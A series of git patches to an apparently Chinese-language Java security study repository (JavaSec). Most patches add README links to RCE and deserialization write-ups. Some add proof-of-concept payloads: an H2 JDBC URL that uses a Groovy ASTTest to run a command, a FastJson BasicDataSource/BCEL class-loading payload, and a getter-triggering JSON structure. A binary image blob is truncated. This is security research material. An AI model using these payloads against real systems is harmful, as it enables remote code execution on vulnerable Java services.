From c8f4e02822e739b1c150a8b45bccb3c0e990328e Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 28 Jul 2023 14:38:36 +0800 Subject: [PATCH 01/72] Update README.md metabase pre auth rce --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index cd2e54f..5ab3346 100644 --- a/README.md +++ b/README.md @@ -377,6 +377,7 @@ - 其他 - [HtmlUnit-RCE](https://siebene.github.io/2022/12/30/HtmlUnit-RCE/) - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) + - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) From 9cb5d45255c9f88221aecf0e835be9d0d40654c6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 30 Jul 2023 21:23:06 +0800 Subject: [PATCH 02/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 5ab3346..8ea9115 100644 --- a/README.md +++ b/README.md @@ -28,6 +28,7 @@ - [ClassLoader(类加载机制)](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/ClassLoader(%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6)/ClassLoader(%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6).md) - [SPI学习](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/SPI/SPI.md) - [JavaAgent](http://wjlshare.com/archives/1582) +- [Java9模块化特性](https://developer.aliyun.com/article/618778) - [JMX](https://zhuanlan.zhihu.com/p/166530442) - [JMX补充学习这哥们写的不错](https://github.com/ZhangZiSheng001/02-jmx-demo) - [JDWP远程执行命令](https://www.mi1k7ea.com/2021/08/06/%E6%B5%85%E6%9E%90JDWP%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/) From 905b727d0db90939d8adfcd7a34fb47f4b764e1c Mon Sep 17 00:00:00 2001 
From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 31 Jul 2023 13:54:55 +0800 Subject: [PATCH 03/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8ea9115..d9b9fc6 100644 --- a/README.md +++ b/README.md @@ -319,9 +319,9 @@ ## 13.回显相关技术学习 - [通杀漏洞利用回显方法-linux平台](https://www.00theway.org/2020/01/17/java-god-s-eye/) - - [linux下java反序列化通杀回显方法的低配版实现](https://xz.aliyun.com/t/7307) - [Tomcat中一种半通用回显方法](https://xz.aliyun.com/t/7348) +- [半自动化挖掘request实现多种中间件回显](https://gv7.me/articles/2020/semi-automatic-mining-request-implements-multiple-middleware-echo/) From 736e69e96e1f741aa120a6c8c8d440ae47134052 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 31 Jul 2023 15:48:05 +0800 Subject: [PATCH 04/72] Update index.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 修正一处重复 --- 9.JDBC Attack/h2/index.md | 20 +++++--------------- 1 file changed, 5 insertions(+), 15 deletions(-) diff --git a/9.JDBC Attack/h2/index.md b/9.JDBC Attack/h2/index.md index 38f74a6..8f48f68 100644 --- a/9.JDBC Attack/h2/index.md +++ b/9.JDBC Attack/h2/index.md 
@@ -51,26 +51,16 @@ private static boolean isGroovySource(String var0) { return var0.startsWith("//groovy") || var0.startsWith("@groovy"); } ``` - -但是也不是每个项目都有Groovy - +利用 ```java - public static void main(String[] args) throws Exception { - Class.forName("org.h2.Driver"); - - String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" + - "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" + - "java.lang.Runtime.getRuntime().exec('open -na Calculator')\n" + - "$$\n"; - Connection conn = DriverManager.getConnection(url); - conn.close(); - } +Class.forName("org.h2.Driver"); +String groovy = "@groovy.transform.ASTTest(value={" + " assert java.lang.Runtime.getRuntime().exec(\"calc\")" + "})" + "def x"; +String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '" + groovy + "'"; ``` +但是也不是每个项目都有Groovy,这时候可以使用js执行命令 -## 无其他依赖通过Javascript - ``` public static void main(String[] args) throws Exception { Class.forName("org.h2.Driver"); From c2e039001a63e6baef52f0208b27e37e6342ba61 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 31 Jul 2023 15:53:36 +0800 Subject: [PATCH 05/72] Update index.md --- 9.JDBC Attack/h2/index.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/9.JDBC Attack/h2/index.md b/9.JDBC Attack/h2/index.md index 8f48f68..dccf558 100644 --- a/9.JDBC Attack/h2/index.md +++ b/9.JDBC Attack/h2/index.md @@ -79,7 +79,7 @@ String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '" + com.h2database h2 -1.4.196 +1.4.197 ``` From 9fed321aa9119a573499f386184a0044f794328a Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 31 Jul 2023 21:45:58 +0800 Subject: [PATCH 06/72] Update README.md --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index d9b9fc6..de00e46 100644 --- a/README.md +++ b/README.md 
@@ -360,10 +360,9 @@ - [Apache Dubbo 反序列化漏洞(CVE-2023-23638)分析及利用探索](https://yyhylh.github.io/2023/04/08/Apache%20dubbo%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2023-23638%EF%BC%89%E5%88%86%E6%9E%90%E5%8F%8A%E5%88%A9%E7%94%A8%E6%8E%A2%E7%B4%A2/) - [Apache Dubbo反序列化漏洞(CVE-2023-23638)完整利用及工程化实践](https://yyhylh.github.io/2023/05/11/Apache%20Dubbo%20%EF%BC%88CVE-2023-23638%EF%BC%89%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8%E5%8F%8A%E5%B7%A5%E7%A8%8B%E5%8C%96%E5%AE%9E%E8%B7%B5/) - Oracle - - [Oracle E-Business Suite Unauthenticated RCE](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-21587/index.md) - - [Exploiting an Order of Operations Bug to Achieve RCE in Oracle Opera](https://blog.assetnote.io/2023/04/30/rce-oracle-opera/) + - [Oracle Access Manager Pre-Auth RCE (CVE-2021–35587 Analysis)](https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316) - Nacos - [Aliababa Nacos hessian JRaft反序列化(文章里提到的只能打一次有误,后经过研究可以打多次)](https://y4er.com/posts/nacos-hessian-rce/ ) From a82cc6aa589c33f2107256ac51c37d1310fb570a Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 18 Aug 2023 17:11:12 +0800 Subject: [PATCH 07/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 解决markdown一处排版问题 --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index de00e46..600d952 100644 --- a/README.md +++ b/README.md @@ -376,7 +376,7 @@ - 其他 - [HtmlUnit-RCE](https://siebene.github.io/2022/12/30/HtmlUnit-RCE/) - - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) + - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) 
From 4eebca50f8d826f14bb1526935ec83cb30a6d00d Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 25 Aug 2023 09:39:03 +0800 Subject: [PATCH 08/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 600d952..253f586 100644 --- a/README.md +++ b/README.md @@ -378,6 +378,7 @@ - [HtmlUnit-RCE](https://siebene.github.io/2022/12/30/HtmlUnit-RCE/) - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) + - [Ivanti Sentry Authentication Bypass](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/) From b6ec1fb8a6f95e11264e59a91a15db52d75f19cd Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 27 Aug 2023 11:40:07 +0800 Subject: [PATCH 09/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 253f586..eb9aa71 100644 --- a/README.md +++ b/README.md @@ -135,6 +135,7 @@ - 其他 - [Java JSON解析特性分析](https://javasec.org/javaweb/JSON/FEATURE.html) + - [黑盒判断目标的fastjson版本](https://mp.weixin.qq.com/s/jbkN86qq9JxkGNOhwv9nxA) ## 4.Weblogic专区(虽然也挖了一堆,暂时不想写) - [T3协议学习](https://github.com/Y4tacker/JavaSec/blob/main/4.Weblogic专区/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0.md) From 5c831e08b29b948d0a37ae1a5f4fb9f8bd8340d6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 27 Aug 2023 11:46:22 +0800 Subject: [PATCH 10/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 利用Swing构造反序列化SSRF/RCE(JDK CVE-2023-21939) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index eb9aa71..85a7aab 100644 --- a/README.md +++ b/README.md 
@@ -76,6 +76,7 @@ - [反序列化在渗透测试当中值得关注的点](https://github.com/Y4tacker/JavaSec/blob/main/2.%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%BD%93%E4%B8%AD%E5%80%BC%E5%BE%97%E5%85%B3%E6%B3%A8%E7%9A%84%E7%82%B9/index.md) - [构造java探测class反序列化gadget](https://mp.weixin.qq.com/s/KncxkSIZ7HVXZ0iNAX8xPA) - [对URLDNS探测class的补充(为什么本地明明没有这个类却有"DNS解析")](https://github.com/Y4tacker/JavaSec/blob/main/2.%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/URLDNS%E6%8E%A2%E6%B5%8Bclass%E7%9A%84%E8%A1%A5%E5%85%85/index.md) +- [利用Swing构造反序列化SSRF/RCE(JDK CVE-2023-21939)](https://github.com/Y4Sec-Team/CVE-2023-21939) - Hessian反序列化 - [Hessian 反序列化知一二](https://su18.org/post/hessian/) From 4ed07607bd7334cf90c101e84d687c6a5572d942 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 27 Aug 2023 16:45:16 +0800 Subject: [PATCH 11/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit fastjson探测class --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 85a7aab..fcbbde3 100644 --- a/README.md +++ b/README.md @@ -137,6 +137,7 @@ - 其他 - [Java JSON解析特性分析](https://javasec.org/javaweb/JSON/FEATURE.html) - [黑盒判断目标的fastjson版本](https://mp.weixin.qq.com/s/jbkN86qq9JxkGNOhwv9nxA) + - [fastjson探测class](https://github.com/safe6Sec/Fastjson) ## 4.Weblogic专区(虽然也挖了一堆,暂时不想写) - [T3协议学习](https://github.com/Y4tacker/JavaSec/blob/main/4.Weblogic专区/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0.md) From b3dd517849892eaf3feb5320e2f6087785d4b5e9 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 27 Aug 2023 17:10:04 +0800 Subject: [PATCH 12/72] Update FastJson Trick.md --- .../FastJson Trick.md" | 40 ++++++++++++++++++- 1 file changed, 39 insertions(+), 1 deletion(-) 
diff --git "a/3.FastJson\344\270\223\345\214\272/\346\234\211\350\266\243Trick/FastJson Trick.md" "b/3.FastJson\344\270\223\345\214\272/\346\234\211\350\266\243Trick/FastJson Trick.md" index c121027..1cfc679 100644 --- "a/3.FastJson\344\270\223\345\214\272/\346\234\211\350\266\243Trick/FastJson Trick.md" +++ "b/3.FastJson\344\270\223\345\214\272/\346\234\211\350\266\243Trick/FastJson Trick.md" @@ -1,6 +1,6 @@ # FastJson Trick.md -## parse调用parseObjetc +## parse调用parseObjetc从而触发setter Fastjson反序列化的时候所用的是Parse而不是ParseObject,这里就会有一个Trick,就是在原本的@type上再嵌套一层@type,并设置为 '@type':"com.alibaba.fastjson.JSONObject", @@ -23,4 +23,42 @@ Fastjson反序列化的时候所用的是Parse而不是ParseObject,这里就 ``` ## parse触发get另一种思路 https://mp.weixin.qq.com/s?__biz=MzAxNTg0ODU4OQ==&mid=2650358489&idx=1&sn=2d1f600da6f01b644544331a844139ae&chksm=83f0273bb487ae2d85984c541adc7a928bdca396aa6ad3c0c349e2ef044558539f2f7075ad1f&mpshare=1&scene=23&srcid=1123yB78GUjwHduKmaU9BGSa&sharer_sharetime=1637650532436&sharer_shareid=18ef5175242004180f2ee4dd9c244e8a#rd +``` +{ + { + "x":{ + "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", + "driverClassLoader": { + "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" + }, + "driverClassName": "$$BCEL$$$l$8b$I$A$..." + } + }: "x" +} +``` +这里PoC结构上还有一个值得注意的地方在于, + +先是将 {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"……} 这一整段放到JSON Value的位置上,之后在外面又套了一层 "{}"。 +之后又将 Payload 整个放到了JSON 字符串中 Key 的位置上。 + + +## su18师傅分享的一种触发getter/setter思路 +``` +{ + "@type": "java.util.Currency", + "val": { + "currency": { + "abc": { + "@type": "java.util.Map", + "aaa": { + "@type": "org.su18.fastjson.common.Person", + "a": "s", + "age": 12, + "name": "su18" + } + } + } + } +} +``` From 5bd0790a161e1184eb29b1a000a406b383a3e9a6 Mon Sep 17 00:00:00 2001 
From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 27 Aug 2023 17:12:37 +0800 Subject: [PATCH 13/72] =?UTF-8?q?Update=20=E8=A1=A5=E5=85=85.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../\350\241\245\345\205\205.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/3.FastJson\344\270\223\345\214\272/\350\241\245\345\205\205.md" "b/3.FastJson\344\270\223\345\214\272/\350\241\245\345\205\205.md" index a0f6719..ebb0a95 100644 --- "a/3.FastJson\344\270\223\345\214\272/\350\241\245\345\205\205.md" +++ "b/3.FastJson\344\270\223\345\214\272/\350\241\245\345\205\205.md" @@ -4,7 +4,7 @@ -网上很多说法是与smartMatch去除下划线有关,但其实不太准确,在JavaBeanDeserializer里面维护了一个filedInfo对象,里面存了一些变量信息但是没有_bytecodes,原因是因为这个字段在方法当中没有set方法,并且没有get方法,当然多说一点在build JavaBeanInfo的时候,他会去遍历这个对象的所有方法,如果是set方法必须保证参数只能有一个,返回值要么是void要么是当前类对象,get方法则要求必须是一些集合类之类的 +在JavaBeanDeserializer里面维护了一个filedInfo对象,里面存了一些变量信息但是没有_bytecodes,原因是因为这个字段在方法当中没有set方法,并且没有get方法,当然多说一点在build JavaBeanInfo的时候,他会去遍历这个对象的所有方法,如果是set方法必须保证参数只能有一个,返回值要么是void要么是当前类对象,get方法则要求必须是一些集合类之类的 ``` Collection.class.isAssignableFrom(method.getReturnType()) || Map.class.isAssignableFrom(method.getReturnType()) || AtomicBoolean.class == method.getReturnType() || AtomicInteger.class == method.getReturnType() || AtomicLong.class == method.getReturnType() From e6a1eeddac25263d51bb3cdac3e87187fa85745d Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 27 Aug 2023 17:18:01 +0800 Subject: [PATCH 14/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index fcbbde3..d90a3b3 100644 --- a/README.md +++ b/README.md 
@@ -137,7 +137,7 @@ - 其他 - [Java JSON解析特性分析](https://javasec.org/javaweb/JSON/FEATURE.html) - [黑盒判断目标的fastjson版本](https://mp.weixin.qq.com/s/jbkN86qq9JxkGNOhwv9nxA) - - [fastjson探测class](https://github.com/safe6Sec/Fastjson) + - [fastjson探测class/如何判断是fastjson、jackson、gson](https://github.com/safe6Sec/Fastjson) ## 4.Weblogic专区(虽然也挖了一堆,暂时不想写) - [T3协议学习](https://github.com/Y4tacker/JavaSec/blob/main/4.Weblogic专区/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0.md) From b99397bb5d9b38dbbff0885e8e726f54e3f32763 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 5 Sep 2023 09:33:03 +0800 Subject: [PATCH 15/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index d90a3b3..5b47a5f 100644 --- a/README.md +++ b/README.md @@ -257,6 +257,7 @@ - [Hive-RCE](https://github.com/Y4tacker/hue-hive-rce) - [2023BalckHat Asia上补充关于informix-sqli、db2、cloudspanner、avatica、snowflake的利用姿势](https://i.blackhat.com/Asia-23/AS-23-Yuanzhen-A-new-attack-interface-in-Java.pdf) - [JDBC利用链结合原生反序列化的思路](https://mogwailabs.de/en/blog/2023/04/look-mama-no-templatesimpl/) +- [JDBC Attack URL 绕过合集](https://mp.weixin.qq.com/s/lmoWKK41ZQzZOh-P26VUng) ## 10.关于JNDI的整理 From 091430d50d0e862064607e265ebad3d6d0e1f983 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 5 Sep 2023 10:29:27 +0800 Subject: [PATCH 16/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 一些国产系统的搭建 --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5b47a5f..07cd3be 100644 --- a/README.md +++ b/README.md @@ -484,8 +484,8 @@ ## 环境 - [如何远程调试Weblogic](https://github.com/QAX-A-Team/WeblogicEnvironment) - - [使用idea进行tomcat源码调试](https://zhuanlan.zhihu.com/p/35454131) +- [一些国产系统的环境搭建问题](https://github.com/ax1sX/SecurityList/) 
From 8f58d5c41d12ece25c9c1ebe41eabfd1c5ea3d70 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 5 Sep 2023 10:33:18 +0800 Subject: [PATCH 17/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 07cd3be..1b3e845 100644 --- a/README.md +++ b/README.md @@ -138,6 +138,7 @@ - [Java JSON解析特性分析](https://javasec.org/javaweb/JSON/FEATURE.html) - [黑盒判断目标的fastjson版本](https://mp.weixin.qq.com/s/jbkN86qq9JxkGNOhwv9nxA) - [fastjson探测class/如何判断是fastjson、jackson、gson](https://github.com/safe6Sec/Fastjson) + - [记一次 Fastjson Gadget 寻找](https://mp.weixin.qq.com/s/dJkZuf6Ho6EK71bbnXI0EA) ## 4.Weblogic专区(虽然也挖了一堆,暂时不想写) - [T3协议学习](https://github.com/Y4tacker/JavaSec/blob/main/4.Weblogic专区/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0.md) From 23ae364848f6f9dc7a012f51b035aae144d93ddd Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 6 Sep 2023 11:51:11 +0800 Subject: [PATCH 18/72] Add files via upload --- .../img/1.png" | Bin 0 -> 106851 bytes .../index.md" | 94 ++++++++++++++++++ 2 files changed, 94 insertions(+) create mode 100644 "2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/img/1.png" create mode 100644 "2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" 
diff --git "a/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/img/1.png" "b/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/img/1.png" new file mode 100644 index 0000000000000000000000000000000000000000..e779561202ea7c37c005bd22ea04e78683cc99a9 GIT binary patch literal 106851

* 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 